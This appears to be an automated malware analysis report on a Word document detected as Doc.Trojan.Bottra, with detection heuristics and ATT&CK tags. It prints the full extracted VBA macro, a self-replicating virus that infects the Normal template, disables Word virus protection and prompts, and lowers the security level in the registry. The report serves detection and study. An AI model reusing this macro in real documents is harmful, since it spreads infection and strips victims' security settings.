MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious OLE document containing VBA macros, specifically a Document_Open macro. This macro writes its own code to a temporary file 'c:\tk.mxc', then attempts to inject this code into the Normal.dot template and the active document. It also modifies registry keys related to Word security settings. The presence of a Document_Open macro and the modification of templates strongly suggests an attempt to establish persistence or facilitate further execution, characteristic of a downloader or dropper malware.
Heuristics 3
-
ClamAV: Doc.Trojan.Bottra-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Bottra-2
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1477 bytes |
SHA-256: 474c24900c4da254c338f05eded8e0a670faf8f233caffa0c4e22aa0e256270b |
|||
|
Detection
ClamAV:
Doc.Trojan.Bottra-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Bottra
Private Sub Document_Open()
On Error Resume Next
Dim ThisDoc, NTmp As Object
Dim MyCode As String
Set ThisDoc = ThisDocument.VBProject.VBComponents.Item(1).CodeModule
Set NTmp = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
Set ADoc = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
TCode = NTmp.CountOfLines
ACode = ADoc.CountOfLines
MyCode = ThisDoc.Lines(1, ThisDoc.CountOfLines)
Open "c:\tk.mxc" For Output As #1
Print #1, "Attribute VB_Name=""ThisDocument"""
Print #1, MyCode
Close #1
NTmp.DeleteLines 1, TCode
NTmp.AddFromFile "c:\tk.mxc"
ADoc.DeleteLines 1, ACode
ADoc.AddFromFile "c:\tk.mxc"
ActiveDocument.Saved = False
If ActiveDocument.Saved = False Then ActiveDocument.Save
ShowVisualBasicEditor = False 'CommandBars("Tools").Controls("Macro").Enabled = False
Application.EnableCancelKey = wdCancelDisabled
With Options: .SaveNormalPrompt = False: .VirusProtection = False: .SavePropertiesPrompt = False: End With
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\9.0\Word\Security", "Level") = 1
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.